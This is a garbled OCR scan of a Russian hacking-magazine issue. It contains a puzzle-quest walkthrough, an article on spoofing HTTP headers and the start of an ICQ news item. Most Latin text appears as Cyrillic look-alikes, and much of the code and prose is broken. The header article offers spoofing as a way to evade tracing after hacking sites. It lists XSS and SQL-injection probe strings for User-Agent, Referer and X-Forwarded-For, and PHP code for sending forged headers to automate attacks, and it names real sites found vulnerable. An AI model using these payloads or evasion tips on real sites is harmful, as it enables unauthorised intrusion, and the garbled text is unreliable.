+0.333333333333+0.333333333333+0.333333333333), $ =$СЬ0ВАІі5 [ ' _6 13 75785 6_' ] [1] ( 

$ );$ <=$ ; $ ++) есіго $0Ь0ВАЬ8 [ ' _613757856_' ] [2] ( $0Ь0ВАЬ5 [ ' _613757856_' ] [3 

] ( $ [ $ -$ ] ) А гоипй (0+1+1+1+1+1) ) ; } } е1яе{ есЬо < «5 

<±огю шес1іос1= ,, розс"> 

Приоткрываем завесу Ьа$е64 и пытаемся понять логику 
скрипта 




Исследуем содержимое РОМ-файла с помощью 
Нехрозиге 



Уровень 4 

Автор: Каіті 

Решение: Разобравшись с РНР, переходим на уровень 4. Здесь нас 
ждет модифицированный РОМ игры «Чип и Дейл» для Оепбу, кото- 
рый специально для тебя приготовил Каіті. В задании к уровню 
написано, что, пройдя несколько уровней в игре, мы найдем пароль 
— нам сообщит его Гаечка. И это является самым простым путем 
прохождения, не нужно даже особо напрягаться, стоит лишь немного 
побегать в игрушке и ни в коем случае не пропускать диалоги с пер- 
сонажами. Но есть и другой путь... Каіті ведь как-то этот РОМ смог 
изменить, а значит, ты сможешь узнать пароль, не играя в игру! 
Хакерское решение: Тебе потребуется Нех-редактор, поддерживаю- 
щий кастомные таблицы символов (соответствие "код" <-> "символ"). 
Проще всего воспользоваться редактором Нехрозиге. Открываем 
интересующий нас РОМ в эмуляторе Ыез1:іс1е, ищем момент в игре, 
где используется какой-либо текст (например, меню в начале игры). 

В меню эмулятора выбираем просмотр палитры, там отобразятся 
используемые в данный момент спрайты игры. Нажимаем курсором 
на спрайты с буквами и цифрами — появляется окно с шестнадцате- 
ричным представлением этого символа. 

Далее необходимо составить таблицу соответствий, например: 

80 = 0 
81 = 1 
8А=А 

Сохраняем ее в файл с расширением ІЫ. Затем берем РОМ, 
открываем его в Нехрозиге, выбираем в меню загрузку кастомной 
таблицы символов и загружаем созданную нами таблицу. После 
этого можно воспользоваться поиском по тексту или вручную про- 
матывать содержимое РОМ'а, чтобы найти строки, используемые 
в игре. 

Способ не совсем универсальный, так как иногда используются 
алгоритмы сжатия текста, но для нашей игры он отлично подойдет. 
Кстати, Гаечка нам пароль в открытом виде все-таки не скажет :). 
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С : 1№1№ОШ5 Ьзугіет Э 2 ктгі е хе 



: \й і>|пЯе і'Ѵ\мю\ч(ій :ОиУ2.^1 
: \Й і'ѵЧідл гЧіц і е і С Ь{ 2 . рі 

_ = 2М11:;доІ:о ІІіІііІ ІГ в"=<$_ ец’ Іате* > ; : ' 1 ^П< ' С>< .* Л* ЗЬЧУУКЦіѴЗѴиТіМІР 
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Снимаем начальную обфускацию РегІ 

Она продиктует нам несколько символов и сообщит, что следу- 
ет их «ХОР ВУ 0X03». Если ты не знаешь, что такое ХОР, проще 
всего забить это слово в любой поисковик или прочитать статью 
на Вики. Узнав, что это операция «исключающее или», и про- 
читав подсказку к квесту, которая, как обычно, вылазит при вводе 
неверного ответа на задание, мы поймем, что к каждому символу, 
который продиктовала Гаечка, необходимо применить эту самую 
операцию. Например, на РНР это будет выглядеть так: 

<?рЬр 

$зСгіпд = 'пароль от Гаечки'; 

Гог($і = 0, $1еп = зСгІеп ($зСгіпд) ; $і < $1еп; $і++) 

ргіпР сЬг (огс!($зСгіпд [$і] ) л 0x03); 



*1о1) (сопзГ с лаг* , ...) = ргіпГГ; 

/* Здесь используется функция ргіпГГ, 
которая нигде не определена. Набрав ее 
имя в поисковике, определим, 
строки #іпс1ибе "зббіо.Н". Поставим ее 
после #іпс1ибе "ѵ^іпбоѵ^з . И" */ 

Гог(с]іаг * і = разз; *і != 0; *і л = *(і +++1)); 
Гог(зІ 2 е_Ь і = 0, і < 8; апз += разз[і++]); 

// Тут вместо точки с запятой после і = 0 
стоит запятая 

Іоі ( " %Х\г\п" , апз *= 2) 

// А тут пропущена точка с запятой после 
вызова функции 
} 

После исправления ошибок компилируем программу в любом компи- 
ляторе и получаем ответ — 17С. 



?> 

Запускаем скрипт, получаем пароль и переходим к следующему 
заданию. 

Уровень 5 

Автор: Каіті 

Решение: Да-да, это снова обфускация, но на этот раз скрипт на 
Регі’е. Копируем код скрипта и пробуем запустить его в консоли, но он 
просто завершается, ничего не выводя. Опять, как в третьем уровне, 
меняем еѵаі на ргіпі и получаем какой-то странный вывод. Тут может 
сначала показаться, что пароль к скрипту — «Іате», но если мы это 
слово передадим как аргумент командной строки, то снова ничего не 
получим. Здесь стоит обратить внимание на строчку "369У9КІД73У 
ЖІХ4ШБ7 460Мхд 1Ккр4Ъ6 Г7 А4тЪТѴЙгм5 з ГпАгтіНЕ21ІАЗ ѴпсІѴГ л 
" СБР7МгпбУрбЗ ІЗхѴбМ-УЗШ. 9 2 ЛХ-СТиОдО ІдіМБгцгІ бд4 0 5дЗМ- 
42ГІБ8ІМІ" — похоже, тут что-то зашифровано, и для расшифровки 
используется уже знакомый ХОР. Создаем скрипт, который будет выво- 
дить эту строку с помощью оператора ргіпі, сохраняем его с расшире- 
нием рі, запускаем из командной строки и получаем ответ: ргіпС "\ 
пСосіе: ЬагіпдаХп" ІГ($АК0Ѵ[О] && $АШѴ[0] ед 'рѵш'). 
Становится ясно, что пароль к следующему уровню — Ьагіпда. 

Уровень 6 

Автор: сіх 

Решение: Этот уровень не требует мысленных усилий. Все, что 
потребуется от тебя — расслабить зрение и увидеть стерео картинку, 
которая отображается в консоли квеста. На ней всегда три цифры, но 
они генерируются случайным образом, с использованием случайного 
бэкграунда. В тексте задания есть ссылка на статью про то, как смо- 
треть такие изображения. Поверь, способов очень много, и ты обяза- 
тельно сможешь найти наиболее удобный для себя. В конце концов, 
можно написать простенький брутфорс, потому что вариантов ответа 
всего 1 000, как я уже сказал. 



Уровень 8 

Автор: Каіті 

Решение: В этом задании тебе предлагается посмотреть корот- 
кий ЗѴѴР-ролик и отыскать в нем пароль. Сразу же появляется 
мысль о скрытых кадрах, и эта мысль верна. Как же их про- 
смотреть? Простейший вариант — открыть флешку в Мебіа 
Ріауег Сіаззіс и пролистать ее до конца. Более сложный — 
воспользоваться какой-либо программой для декомпиляции 
бІазГі , например, Зоібіпк 5ѴѴР Оесотрііег’ом — пароль указан 
на фрейме 28. 

Уровень 9 

Автор: сіх 

Решение: Здесь тебе придется столкнуться с видеороликом, в кото- 
ром каким-то образом спрятан пароль. Тут все донельзя просто — 
стоит лишь открыть видеоролик в Блокноте и пролистать его в самый 
конец. Там находится приписанный код для перехода на следующий 
уровень. 

Уровень 10 

Автор: сіх 

Решение: Этот уровень рассчитан на написание небольшого коли- 
чества кода. У тебя есть гаг-архив с именем 500. гаг, внутри которого 
лежит 499. гаг, внутри которого — 498. гаг, и так до О.гаг, в котором 
лежит заветный текстовик с паролем. Конечно, ты можешь упорно 
распаковывать все это вручную (а каждый архив еще и запаролен, 
пароль на все архивы такой же, как пароль перехода на этот уро- 
вень). Но можно просто написать батник, и он все сделает за тебя. 
Вот пример: 

@ес±ю оГГ 

Гог /Ь %%і іп (500,-1,0) сіо саіі : агсЬ %%і 
ехіС /Ь 



Уровень 7 

Автор: сіх 

Решение: Теперь немного С++. Тебе выдается исходный код, в нем 
нужно поправить ошибки, чтобы получить пароль. Ошибок здесь 
всего три: 



: агсЪ. 
зеГ а=%1 

гаг х -г -рзріеІЬегд %а%.гаг 
сіеі %а%.гаг" 



#іпс1исіе "міпскжз . А" 



ехіР /Ь 



ѵоісі гпаіп ( ) 

{ 

ШОКБ апз = 0; 



Запускать его нужно из директории ѴѴіпРАР’а, положив туда же файл 
500. гаг; через пару минут там же окажется файлик раззѵѵогсІ.М с 
ответом. 



► 048 
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Ответ — в ресурсах! 



Уровень 11 

Автор: сіх 

Решение: На этом уровне тебе дадут прослушать небольшой звуко- 
вой файл. Никаких паролей в конце не имеется, поэтому остается 
лишь догадаться, что это осмысленный текст, перевернутый задом 
наперед. Используем какой-нибудь софт, чтобы повернуть звук 
обратно (например, ЗоипсІЕогде), слушаем его и получаем код. 

Уровень 12 

Автор: Каіті 

Решение: Этот уровень сложнее предыдущих. Ты увидишь картинку 
с непонятным рисунком, и будет предложено определить, что же это 
такое. Вероятно, ты уже и так угадал, что это ОР-код, если же нет 
— можно попробовать найти ответ, используя все тот же Тіпеуе или 
сервис поиска картинок от Ѳоодіе, задав такие же размеры картинки 
как у той, которую тебе выдали, и, введя в строку поиска «цс», — имя 
нашего изображения. Воспользовавшись каким-нибудь онлайн- 
дешифратором ОР-кодов (например, гхіпд.огдА/ѵ/сІесосІедзрх ]. полу- 
чим слово «РАР!». Пробуем сменить расширение файла картинки 
на гаг, открываем в ѴѴіпРАР’е и видим, что к изображению, на самом 
деле, прикреплен архив с документом, в котором записан пароль! 
Почему в конец изображения можно дописать РАР-архив, при этом 
и картинка, и архив будут открываться нормально? Дело в том, что 
в заголовке РЫб-файла уже записана длина файла изображения, и 
все, что идет дальше, не интересует графические редакторы и про- 
смотрщики. А ѴѴіпРАР просто ищет свой заголовок по всему телу 
файла и начинает распаковку с того места, где заголовок нашелся, 
поэтому данные изображения его также не волнуют. 

Уровень 13 

Автор: сіх 

Решение: Вот и настал черед исполняемого файла. Но и здесь все 
не так сложно, как кажется на первый взгляд — ничего дизассем- 
блировать не требуется. Думаю, тебе известно, что очень многие ехе- 
файлы используют секцию ресурсов для хранения своей служебной 
информации (строки, формы, иконки и т.д.). Здесь тот же самый слу- 
чай. Открываем файл в любом редакторе или просмотрщике ресур- 
сов, например, в известном Резоигсе Наскег’е, и сразу замечаем 
таблицу строк, в которой и лежит нужный пароль. 

Уровень 14 

Автор: сіх 

Решение: Это задание, как и уровень со стереокартинкой, является 



уникальным для каждого. Для перехода на последний уровень нужно 
решить простую задачку: необходимо взять свой никнейм, с 
которым ты зарегистрировался в квесте, сложить все АЭСІІ-коды 
символов, из которых он состоит, после чего рассчитать остаток 
отделения получившегося значения на сотню, а потом сдвинуть 
получившееся число влево на два бита — это будет ответом. Не 
буду давать комментариев к этому уровню, он и так очень про- 
стой. Скажу только, что операция сдвига влево эквивалентна 
умножению на два. Соответственно, сдвиг на два бита — это 
умножение числа на 4. Подробнее об операциях с битами ты смо- 
жешь прочитать в интернете, информации очень много. 

Уровень 15 

Автор: Каіті 

Решение: Пожалуй, это самый сложный уровень в квесте, хотя, 
если ты знаешь ответ, то сможешь пройти его за пару минут. 

Здесь снова ехе-файл, который при запуске играет какую-то ком- 
позицию. Предлагается определить, из какой игры эта музыка 
взята. Если ты введешь в консоль квеста неправильный ответ, 
то увидишь подсказку: І\ІЕ5 115 89. Как видно, она говорит о том, 
что игра эта была издана на ЫЕ5 в США в 1989 году. Непростой 
вопрос, но решаемый, даже если ты понятия не имеешь, о чем 
речь. Достаточно зайти на Википедию и найти на ней список 
всех игр ІЧЕ5 ( ги.ѵѵікіресІіа.огд/ѵѵікі/Список игр для ЫЕ5/ ]. После 
этого последует перебор всех позиций с 1989 годом выхода, и, 
наконец, ты найдешь ее — ІМіща Оаісіеп. Перебирать ключ к ехе 
брутфорсом, думаю, смысла не имеет, потому что в программе 
используется достаточно криптостойкое шифрование. После 
ввода правильного названия программа выдаст пароль для 
завершения квеста. 

Финал 

Можно тебя поздравить — ты справился с заданием и достоин 
награды! Надеемся, что ты использовал наши подсказки по 
минимуму, а если и использовал, то открыл для себя много ново- 
го и интересного. На этом дело, кстати, не заканчивается; не так 
давно мы с Каіті смастерили второй квест, который расположен 
здесь: каіті.ги/диезі х2/ . 

Решения его пока что в открытом виде нет, так что дерзай! 

Уровни в нем очень разнообразные, как и в этом квесте, слож- 
ность на этот раз нарастает постепенно, а еще я добавил туда 
помощника, который намекнет тебе, как пройти каждый уровень, 
если ты его об этом попросишь :). Удачи тебе в прохождении и 
саморазвитии! іні 
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ТАКИЕ РАЗНЫЕ 
ЗАГОЛОВКИ 

Изучаем НТТР-взаимодействие 

# Общеизвестно, что браузер при НТТР-запросах передает серверу 
такие «личные» данные, как операционная система, браузер, язык 
системы и кое-что еще. Кто избежать такого палева? И можно ли это 
использовать в своих благих намерениях? 



Для начала приведу немного теории о том, чем мы пользуемся 
довольно давно. НТТР (НурегТехІ Тгапзіег Ргоіосоі — «протокол пере- 
дачи гипертекста») — клиент-серверный протокол передачи данных, 
который служит для получения информации с веб-сайтов. Был пред- 
ложен создателем всея ѴѴѴѴѴѴ Тимом Бернерсом-Ли. Структура его 
проста: тип сообщения, заголовки, тело сообщения. Существуют 
РРС, стандартизирующие НТТР (последняя версия — 1.1), согласно 
которым клиент должен посылать серверу заголовки, содержащие ту 
самую специфическую информацию о системе и браузере. Обычному 
пользователю это полезно: сайт в зависимости от клиента может 
выдать специфическую верстку (пример — доодіе.сот) или пока- 
зать информацию на нужном языке. Однако для хакера раскрытие 
такой информации может быть вредно или даже опасно. Представим 
ситуацию: некий Иван зашел на сайт, посмотрел на него и решил 
взломать. Загрузил проверенные соксы, поставил красивый дефейс и 
через несколько часов/дней сидел в участке. Ведь несложно сопоста- 
вить данные взломщика сданными остальных посетителей и найти 
настоящий ІР (очень редко встретишь сайт без логирования). Да, 
некоторые факторы не учтены, но вариант возможный. 

Подделка заголовков 

Итак, нам необходимо подделывать заголовки, которые браузер шлет 
серверу. Как кросс-браузерное решение я бы предложил старый 
быстрый Ргохотіігоп. Изначально он предназначен для удаления 
рекламы и полного управления содержимым страницы, так что заме- 
чательно подходит для наших целей. Работает как НТТР-прокси. 

На первый взгляд интерфейс Ргохоппіігоп’а не очень дружелюбен, 
однако разобраться в нем — дело нехитрое. Если нужно использовать 



только подделку заголовков — слева убираем все галки кроме второй 
Жмем на «Неабегз» и редактируем правила подмены: сразу после 
установки — в списке куча правил, добавить свое можно, нажав на 
кнопку Ыеѵѵ. Чтобы задействовать фильтр, нужна галка в поле «оиі». 
Обязательно прочитай русский хелп к программе — там отлично все 
расписано. 

Я пользуюсь Могіііа Рі гебох и предпочитаю вместо внешних про- 
грамм использовать плагины. Татрег Оаіа позволяет перехватывать 
запросы и редактировать заголовки в реальном времени — незаме- 
нимая вещь при ручной проверке. Все просто: в окне плагина жмем 
«Запустить перехват» и вмешиваемся, когда необходимо. Имеются 
пресеты и богатые возможности по изменению значений заголов- 
ков. Для постоянной же подмены заголовков лучше использовать 
плагин Мосіібу Неабегз. Сразу после установки необходимо открыть 
настройки и поставить галку «Аіѵѵауз оп», чтобы подмена происходи- 
ла всегда. Настройка элементарная — открыть главное окно плагина 
и добавить правил. Первое поле — выбор действия («Абб» — доба- 
вить, «Мобібу» — изменить, «Ріііег» — исключить из запроса), второе 
— название заголовка, третье — значение; в четвертом поле можно 
оставить записку. Правила можно двигать, включать и выключать. 

Уязвимые заголовки 

Подделку заголовков можно использовать не только для сокрытия 
своих персональных данных, но и для поиска/эксплуатации уязвимо- 
стей. Ведь серверная часть может некорректно обрабатывать тексто- 
вые строки заголовков и там легко могут существовать классические 
ѵѵеЬ-уязвимости. Прежде всего нам нужно определиться с тем, какие 
типы багов мы будем искать. 
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ІІ> |ИжШу НШеп 



тсутствие фильтрации ІІ$ег-АдепГа на 
сх75рІапе1.ги 

НР-іпсІис1е не подходят, ибо файлы никогда не подклю- 
чают в зависимости от заголовков. Хотя и есть возмож- 
ные исключения, к примеру, инклуд файла в зависимости 
от языка. Впрочем, на практике я такое не встречал. 
Пассивные Х55 основаны на том, что запрос будет 
делать непосредственно пользователь. Заставить 
жертву подменить заголовок едва ли удастся, именно 
поэтому этот тип нам не подходит. Единственная воз- 
можность использовать найденные подменой заголов- 
ков пассивные Х55 — это если на страницу пишется 
Пеіюгег (ссылающаяся страница), да не простой, а 
дополнительно декодированный (избавленный от %хх). 
Тогда можно скриптом перенаправить жертву на себя 
с нужным параметром и после — на уязвимую стра- 
ницу, так что параметр запишется в месте Реіюгег’а. 
Сработает в идеальных условиях, на практике также не 
встречал. 

Активные Х$5 подходят. Смысл в том, чтобы веб- 
приложение занесло в базу наш заголовок, а после пока- 
зало администратору, естественно, не обработав. 
$СИ-инъекции подходят. Это самый простой тип, доста- 
точно, как и обычно, подставлять кавычку. 
РНР-исполнение кода очень редко встречается вообще, 
а с участием заголовков — еще реже. Однако бывает. Тут 
преимущество нашего метода в том, что СЕТ и Р05Т дан- 
ным меньше доверяют. 

Итак, теперь необходимо составить строку, кото- 
рая позволяла бы определить наличие уязвимости. 
Кавычка обязательна. Далее необходимо выйти из 
возможных тегов: простейший способ сделать это 
символами ">. И последнее — алерт, дабы не про- 
спать. В итоге у меня вышло ' "><5Сгір1;>аІег1;(сІоситеп1;. 
соокіе)</5Сгір1>. Ставить на обнаружение исполнения 
кода я не стал; если желаешь, добавь, например, <?'?> 
чтобы вызвать ошибку и заметить уязвимость. Также 
можно добавить в конец обратный слеш (пытаясь 
экранировать закрывающую кавычку), бывают случаи с 
фильтрацией кавычек, бывают без нее. Считаешь, что 
строка слишком длинная и может обрезаться? Замени 
«боситепі.соокіе» на «1». Тут главное — приложить 
фантазию и создать свой идеальной вектор поиска 
уязвимостей. 

Интересные заголовки 

Расскажу о наиболее интересных заголовках, с которыми 
обязательно нужно поиграться при пентесте сайта. 

• ІІзег-Адепі 

Главный враг шпиона. Больше всех выдает информации 
о посетителе: браузер, его версию и язык, движок брау- 
зера, версию движка, операционную систему. Данные 
могут быть написаны как угодно, однако примерный 
формат есть: 



3 



АСЬОП Коте 



Могііѵ ЦЬег-Ддеггі 
имг-Адоі 
АЬё 

А*1 Х-Ъіьѵ&хі-Гѵ 
МкіЪг АссерКйЛрибре 



СооЬе 

Афі X *<№»!«] 

АЙ Й*1іМт 
н» УЫ^АдмЕ 
ѵхг Арепі 
ИкНу инг-Дреггі 



Срега/9.30 {ШгеЬѵга МТ $- 1; Ы; ... 
ое*г*ло.ю">’і:кпійчі4гб{(іос Ага* 
іИПр://'><5аірі>віР‘і{Ліосупегі[.. апоЛ 

... Алж* 

«ѵел-ивдво.з днк& 

в«>с гесумюолиа дга* 

Ігіірі/Аѵѵ^.йжіргфіс.сйіѵі^аіч й&Ѵег 

иа «іег 

ІчмВв^С вятраЮгіТ'бІЕв.Оі кѳ 

Б»^І^і(4ІіНрі:/Дѵш > ді»... боофЬоЕ 
екіі’ріі- со»гі ѵномег** 



дга* 




I “• ] 


1 ] 




1 МдоЦр | 


| моѵ* Осип | 




| &чЫе д?.»ае | 


| БчЫеАІ | 


] оыЫе аі | 


• • 

И 


] СопЛдигАОйЛ | 


1 Свелись 1 



Окно МосІНу Неасіегз с моими настройками 

Браузер/Версия (Платформа; Шифрование; Система, 
Язык[; Что-нибудь еще]) [Дополнения]. В качестве плат- 
формы чаще всего можно увидеть X1 1 или ѴѴіпбоѵѵз, 
иногда туда прямиком помещают систему, убирая соот- 
ветствующий заголовок после. «Шифрование» может 
принимать три значения: «І\І» (ІЧопе) — отсутствует, «I» 
(Іпіегпабопаі) — слабое шифрование ключом до 40 бит, 
«II» (ІІ5А) — сильное шифрование с ключом 128 бит. 
Сейчас все браузеры используют только сильное шифро- 
вание. После скобки добавляется различная информация 
вроде движка, плагинов, дополнений. В качестве брау- 
зера для совместимости часто указывают Могіііа, а после 
информации дописывают реальное название. Это связа- 
но с тем, что издавна девелоперы должны были (или про- 
сто любили) делать сайты не в соответствии с принятыми 
стандартами Консорциума Всемирной паутины (ѴѴогІб 
ѴѴібе ѴѴеЬ Сопзогбит, ѴѴЗС), а под наиболее распростра- 
ненные в данное время браузеры, что приводило к еще 
большему доминированию последних. И сейчас такая 
практика существует, однако с тем отличием, что попу- 
лярным браузерам даны дополнительные возможности, 
связанные с использованием баѵаЭсгірГа (например, на 
распространенном форуме Іпѵізіоп Роѵѵег Воагб, в ветке 
2.3.x, посмотрите профиль участника с отфильтрованным 
заголовком и без). Поэтому советую в строку ІІзег-АдепГа 
включать определение распространенного браузера. 

• Веіегег 

Сообщает о странице, с которой пришел пользователь. 
Заголовок, сильно полезный веб-мастерам для отслежи- 
вания путей попадания на их сайты. Написание — ошиб- 
ка от английского «Реіюггег» («перенаправляющий»). 
Большинство браузеров позволяет отключать передачу 
этого заголовка, однако при этом обычно возникают про- 
блемы с файлообменниками и сайтами-архивами, кото- 
рым очень жалко отдавать контент без показа рекламы, 
так что они позволяют скачивать только при наличии 
их сайта в реферере. Можно подменять ради просмотра 
отдельных элементов сайта — например, картинок — без 
загрузки страниц, где они размещены (при условии, что 
без подделки это сделать не удастся). При пентесте стоит 
учитывать, что часто в базу записывают II РБ не полно- 
стью, а лишь нужную его часть, поэтому стоит пробовать 
«Ыір://еѵіІ», «Ьйр://ехатрІе.сот/еѵіІ» и т.д. 

• Х-Роп/ѵагсІесІ-Рог 

Нестандартный заголовок, используемый неаноним- 
ными прокси-серверами для передачи реального 
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ТЬе Ргохотйгоп. Главное окно 
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ТНе Ргохотіітоп. Список подмены 

Суть в том, что достаточно однажды выставить замену заголовков, 
а после — лишь ловить алерты и исследовать бреши. 

Приведу таблицу подмены. 

ІІзег-АдепС: Орега/10.60 ' " ><зсгірк>а1егк (сІосшпепС . 
соокіе) </зсгірк> 



ІР клиента. Мы не можем вставить кавычку в определяемый 
сервером ІР, зато можем заставить его думать, что это — всего 
лишь прокси, а настоящий ІР — вот он, в Х-Еопл/агсІесІ-Еог. 
Конечно, далеко не все скрипты используют и полагаются на 
ХРР, но этот заголовок принято хотя бы логировать. Нельзя 
забывать проверять веб-приложение на наивность (да - 
да, некоторые сайты, увидев этот заголовок, забывают про 
обычный ІР и пользуются только тем, что передано в данном 
заголовке]. Формат: Х-Рогѵѵагбеб-Рог: сІіепЫр, р гоху 1 _і р , .... 
ргохуІ\І_ір. 

• АссерІЧапдиаде 

Сообщает допустимые языки содержания и их приоритет, именно 
от него зависит язык отображения сайта. Обычно полностью регу- 
лируется настройками браузера. Как я уже говорил, теоретически 
возможен дырявый скрипт с подключением файла, где имя его — 
предпочитаемый язык. Подменять и тестировать в любом случае 
стоит. Обязательно напиши, если найдешь уязвимость, связанную 
с этим заголовком. 

• Ассері-СИаг$еі 

Сообщает допустимые кодировки и их приоритет. Не самый инте- 
ресный заголовок, но стоит обратить на него внимание, ибо он 
может выдать твою систему простым «ѵѵіпсіоѵѵз-і 251 ». 

• Х-Кеяие^еа-ШН 

Нестандартный заголовок, сообщает средство запроса. 
Используется при запросах из баѵаЗсгірІ; без перезагрузки стра- 
ницы. Соответственно полезен для имитации АбАХ (Азупсбгопоиз 
баѵазсгірі; апб ХМІ_) запросов, для этого необходимо установить его 
в значение «ХМЕНирПериезІ». 

• Аигііогігагіоп 

Если серверу необходима авторизация пользователя, он об этом 
прямо сообщает, а браузер предлагает ввести логин и пароль. 
Именно в заголовке АиіЬогігаІіоп они передаются в виде «Вазіс 
Ьа5е64(іі5ег:ра55)». Такую авторизацию намного удобней брутить, 
чем те, которые располагаются непосредственно на странице 
(РОСТ). 

• Соокіе 

Собственно, в этом заголовке посылаются (внезапно) куки. Для 
танкистов поясню: это информация, которую сайт сохраняет на 
компьютере клиента. Подмена данного заголовка полезна тогда, 
когда изменение кукисов невозможно другим образом. 

Применение 

Итак, практика. Я проводил исследование, в ходе которого неко- 
торое время использовал «пассивное обнаружение уязвимостей». 



Кеіегег: кССр://' " ><зсгірр>а1егр (сіоситепк . соокіе) </ 
зсгірк> 

Х-Рогмагсіесі-Рог : 127.0.0.1' "><зсгірк>а1егк (сіоситепк . 
соокіе) </зсгірк> 

Ассерк-Ьапдиаде : еп, еп-ЦЗ ; ч=0 . 9 
АиЫюгігакіоп: Вазіс МЗсуМгоОЦгШ 
Х-Ке<диезкес1-ШкЪ. : ХМЬНРРрКедиезк 
Соокіе: РНРЗЕЗЗІБ=! 

С первыми тремя, думаю, понятно. Если в ладах с английским, 
включи на постоянную подмену АссерІ-І_апдиаде, дабы принимали 
за англичанина. Аиібогігаііоп уместно включать только при про- 
верке конкретного сайта, т.е. есть риск не понять, если где-нибудь 
действительно понадобится авторизация. Про применение заго- 
ловков Х-РериезІеб-ѴѴііЬ и Соокіе я уже писал, однако поясню 
последний. В РНР довольно удобно хранить данные в сессиях: 
собственно данные — на сервере, у клиента — только идентифи- 
катор в куке «РНР5Е55Ю» (название можно менять, но делают 
это, естественно, редко). Так вот, иногда этот идентификатор может 
состоять только из символов а- 2 , А -I, 0-9 и и при передаче 

чего-то иного вызывается ошибка, раскрывающая абсолютный 
путь: 

Шгпіпд: зеззіоп_зкагк ( ) [ іипскіоп . зеззіоп-зкагк] : 

Тке зеззіоп ісі сопРаіпз іііедаі скагаскегз, ѵаіісі 
скагаскегз аге а - 2 , А-2, 0-9 апсі іп /ѵаг /шт/ 

с!ака/ѵ\ллм/1одіп.ркр оп Ііпе 2 

Первое, на что я наткнулся — это поплывшая разметка. Да, дей- 
ствительно на многих сайтах происходил выход из какого-нибудь 
тега (бесполезный), и дальше образовывалась каша. Если ты 
решишь провести собственное исследование — будь готов. Еще 
одно: если чувствуешь, что что-то идет не так (например, не дают 
скачать файл, не показывают картинку во всю ширину, не работает 
перенаправление), выключай подмену Реіюгег’а. 

Никто не знает и не узнает, сколько алертов выловили админы, 
сколько они их увидели у себя в логах, сколько осталось незаме- 
ченными... Однако один случай обнаружения интересной активной 
Х55 есть точно — гугловский сервис ЕеебВигпег, который умеет 
обрабатывать Р55-фиды и логировать трафик сайта. Последнее 
делал он не слишком качественно — не фильтровался Реіюгег. 
Подробнее об этой уязвимости читай на гагОг.пате/ѵиІпегаЬІІШез/ 
акііѵпаѵа-хзз-па-іеесІЬигпег/ ( \л/р.те/рк59-4а ) (не удивляйся, уви- 
дев алерт из-за ХЕЕ :)). 
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ТНе РгохотИгоп. Настройка подмены заголовка 



№я загелевкл ответе 




Татрег Оаіа запросы 



Довольно весело было заходить на всякие сайты с ОІ_Е ЮаІаЫІ'е 
Епдіпе], ибо популярный модуль ОЬЕ Реіюгег Мобиіе не дружил (и 
не дружит) с экранированием плохих символов. Для убедитель- 
ности советую пройтись по сайтам продавцов I СО ІІІКГов и уви- 
деть много МуЗСП-ошибок, хотя картина уже не будет слишком 
печальной — я разослал владельцам сообщения об уязвимости, 
ведь неприятно, когда твои платежные данные и ссылки на опла- 
ту можно подменить. 

Некоторое время назад на рбр.ги можно было наблюдать ошибки 
нефильтрации Реіюгег’а и ХЕЕ. На данный момент уязвимость 
закрыта. Из ошибки с реферером: 

МуЗСЩ Еггог = Уои каѵе ап еггог іп уоиг 8С>Ь зупках; 
сЬеск кке шапиаі ккак соггезропсіз ко уоиг МуЗСЩ 
зегѵег ѵегзіоп ког кке гідкк зупках ко изе пеаг 
' " ' ) ' ак Ііпе 1 

ЗОЬ = ШЗЕКТ ШТО оорз_зеззіопз ( ІБ , 1ЛБ , ЗТАКТ , ЬАЗТ , I 
РЗ , РАСЕЗ , РАСЕ , БАТА , ЕЕЕЕЕК ) ѴАШЕЗ ( ' сірсіи7г1і9 Оеккзс62 
1 , '0' ,1238958331, 1238958331 , ' ххх . ххх . ххх . ххх 1 , 1 , ' / ' , 

' а: 1 : {з : 8 : "ЦЗЕКЕАМЕ" ; з : 10 : "Гость" ; } ' , ' ЗОЬ-Іпз ' Ьеге 1 ) 

Еще один пример — х75р[апе1:.ги . Уязвимы ІІзег-АдепІ и ХЕЕ. ІРВ 
показывает весь запрос. Кроме этих брешей, была замечена еще 
туча ЗСИ-ошибок на сайтах всех мастей, большинство из кото- 
рых просто имели самописные модули обработки информации о 
браузерах, рефах и т.д. Предоставляю тебе возможность найти их 
все :). 

Подмена заголовков в РНР 

Естественно, после ручного анализа ЗСИ-уязвимости наступает 
работа автоматики. Подбор столбцов, полей, вынимание логинов, 
паролей и хешей — все уже давно делают скрипты. Однако боль- 
шинство из них направлено на ОЕТ, Р05Т или Соокіе. Покажу, 
как можно получить страницу, посылая нужные заголовки. 
Предположим, у нас есть массив с такими заголовками и вызов 
функции гедііезі, которая должна возвращать страницу: 

$Ьеас1егз = аггау ( 

' ІІзег-Адепк : ВаЬукоу / 0 . 5 ' , 

' Кекегег : кккр : / /гекгекгек . гек/ошд . рі ' 

) ; 

$Ькш1 = гедиезк_зоскек ( ' Ь.ккр : //127 . О . О . 1/ 
зкюѵтіекеасіегз . ркр ' , $Ьеас1егз) ; 
ескю $Ь.кш1 ; 

Есть несколько основных видов получения страницы из РНР 
(полные версии функций ищи на 0Ѵ0): 




Татрег Оаіа пресеты 

Сокет 

Заголовки напишешь в любом случае. Генерация пакета: 

$раскек = "СЕТ {$иг1} НТТР/1 . 1\г\п" 

. " Нозк : { $кюзк } \г\п" 

. ітріосіе ( " \г\п" , $кеа<іегз) . "\г\п" 

. "Соппескіоп: С1озе\г\п\г \п " ; 

- кі1е_дек_сопкепкз ( ) 

Воспользуемся контекстом для задания нужных параметров: 

$оркз = аггау ( 

' кккр 1 => аггау ( 

' кеасіег' => ітріосіе ( " \г\п" , $Ь.еас1егз) . "\г\п" 




$сопкехк = зкгеат_сопкехк_сгеаке ( $оркз ) ; 
гекигп кі 1е_дек_сопкепкз ( $иг1 , каізе, $сопкехк); 

СигІ 

В сигГе все проще простого: вместе с остальными пара- 
метрами достаточно указать сиг 1_з екор1;($сГі, С I) Р Ю РТ_ 
НТТРНЕАРЕР, фЬеабегз); 

Заключение 

Хотелось бы обратить внимание, что подмена заголовков — 
не панацея от сливания информации. Не стоит забывать о 
ЗаѵаБсгірГе, ЕІазІѴе и интерактивных элементах, которые тоже 
вправе много чего разболтать. Используй N о5сгі рі и прочие 
АбВІоск’и. Всегда экспериментируй и прикладывай выдумку, 
ищи там, где не ищет никто. Удачи! □с 
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ІСОі ВЧЕРА, СЕГОДНЯ ЗАВТРА 



Последние новости из стана ІСО 

• В июле 2010 года состоялась знаменательная сделка по приобретению 
ІСО ІМ российским холдингом 05Т у корпорации А0І_. Сумма сделки 
составила 187 миллионов долларов. В связи со столь замечательным 
событием я просто обязан рассказать тебе о том, что же произошло с 
нашей любимой Аськой за последний год. 



